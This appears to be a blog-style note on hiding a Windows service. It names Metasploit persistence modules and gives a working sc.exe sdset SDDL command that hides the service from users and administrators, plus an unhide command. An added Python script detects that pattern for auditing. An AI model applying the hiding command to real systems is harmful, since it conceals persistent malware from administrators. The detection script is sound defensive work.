Hiding a service with SDDL

Tags: service, hiding
Date: 2023-06-13 09:13:37

use exploit/multi/script/web_delivery 
use exploit/windows/local/persistence_service
cmd:
sc query cqvsfn
sc qc cqvsfn
powershell:
get-service -name cqvsfn

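The method provided by Joshua Wright uses the sdset subcommand of the sc command to modify the service's security descriptor:
Hiding with SDDL
cmd: (hide the service)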
sc.exe sdset cqvsfn "D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

powershell: (unhide the service)
& $env:SystemRoot\System32\sc.exe sdset cqvsfn "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

https://learn.microsoft.com/en-us/sysinternals/downloads/accesschk
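
For auditing, the following added example (not code from the original page) parses a service SDDL string, such as the output of `sc.exe sdshow <service>`, and reports which trustees have a deny ACE on the rights that `sc query` and `sc qc` need. The function names are hypothetical, the two sample strings are the ones passed to `sc.exe sdset` above, and generic-rights codes (GA/GR/GW/GX) are not expanded.

```python
import re

# Added example with hypothetical helper names; not part of the original page.
# SDDL right codes -> access-mask bits as they apply to service objects.
SERVICE_RIGHTS = {
    "CC": 0x0001,  # SERVICE_QUERY_CONFIG
    "DC": 0x0002,  # SERVICE_CHANGE_CONFIG
    "LC": 0x0004,  # SERVICE_QUERY_STATUS
    "SW": 0x0008, "RP": 0x0010, "WP": 0x0020, "DT": 0x0040,
    "LO": 0x0080, "CR": 0x0100,
    "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000,
}
# The rights sc query and sc qc need in order to read a service.
VISIBILITY = {0x0004: "SERVICE_QUERY_STATUS", 0x0001: "SERVICE_QUERY_CONFIG"}

def rights_mask(rights):
    """Turn an ACE rights field (two-letter codes or 0x hex) into a mask."""
    if rights.lower().startswith("0x"):
        return int(rights, 16)
    pairs = (rights[i:i + 2] for i in range(0, len(rights), 2))
    return sum(SERVICE_RIGHTS.get(p, 0) for p in set(pairs))

def hidden_from(sddl):
    """Map trustee -> visibility rights taken away by deny ACEs in the DACL."""
    dacl = re.search(r"D:[A-Z]*((?:\([^)]*\))+)", sddl)
    findings = {}
    for ace in re.findall(r"\(([^)]*)\)", dacl.group(1) if dacl else ""):
        fields = ace.split(";")
        if len(fields) < 6 or fields[0] != "D":  # only access-denied ACEs
            continue
        denied = [n for bit, n in VISIBILITY.items() if rights_mask(fields[2]) & bit]
        if denied:
            findings.setdefault(fields[5], set()).update(denied)
    return {t: sorted(n) for t, n in findings.items()}

# The two descriptors from the page (the strings passed to sc.exe sdset).
HIDDEN = "D:(D;;DCLCWPDTSDCC;;;IU)(D;;DCLCWPDTSDCC;;;SU)(D;;DCLCWPDTSDCC;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"
RESTORED = "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"

if __name__ == "__main__":
    for label, sddl in (("hidden", HIDDEN), ("restored", RESTORED)):
        print(label, hidden_from(sddl) or "no deny ACE on query rights")
```

A non-empty result for IU, SU or BA on a service is the pattern the hide command above produces and is worth alerting on.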